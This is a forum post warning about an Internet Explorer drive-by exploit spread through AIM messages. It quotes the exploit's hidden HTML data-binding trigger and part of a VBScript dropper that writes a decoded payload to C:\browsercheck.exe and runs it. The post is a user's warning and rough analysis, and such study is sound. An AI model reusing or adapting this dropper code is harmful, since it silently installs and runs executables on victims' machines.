LinkBack URL
About LinkBacks
Reply With Quote
This is the newest IE exploit going around. There's a version of it going around on AIM where you will get a IM from an buddy that has the virus telling you to visit a website.
Simple FIX: DON'T RUN IE. Its sucks and its full of un-patched holes that can lead to problems like this. Some are more then 2 years old. Use mozilla.
Here's the exploit
that passes you to a drunkchicks.php which opens up the exploitCode:<div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2"> <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" data="drunkchicks.php"></object> ]]> </exploit> </security> </xml> </div>
Here is a section of it
the payload is encoded. I don't know VB all that well but it looks like simple ascii encoding. If i get bored I'll see if i can decode itCode:function res(x,y) For k = 0 To UBound(v) v(k) = Replace(v(k), x, y) Next End Function res "z", "ff" res "y", "00" For m = 0 To UBound(v) it = it & v(m) Next tmp = Split(it, ",") Set WshShell = CreateObject("WScript.Shell") Set WshEnv = WshShell.Environment("Process") pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe" pth = "C:\browsercheck.exe" Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.CreateTextFile(pth, True) For i = 0 To UBound(tmp) l = Len(tmp(i)) b = Int("&H" & Left(tmp(i), 2)) If l > 2 Then r = Int("&H" & Mid(tmp(i), 3, l-2)) For j = 1 To r f.Write Chr(b) Next Else f.Write Chr(b) End If Next f.Close WshShell.run("""" & pth & """")
If only the tabbrowser pluggin worked 100%, I'd have fully switched, as it is, I still run both.
Bookmarks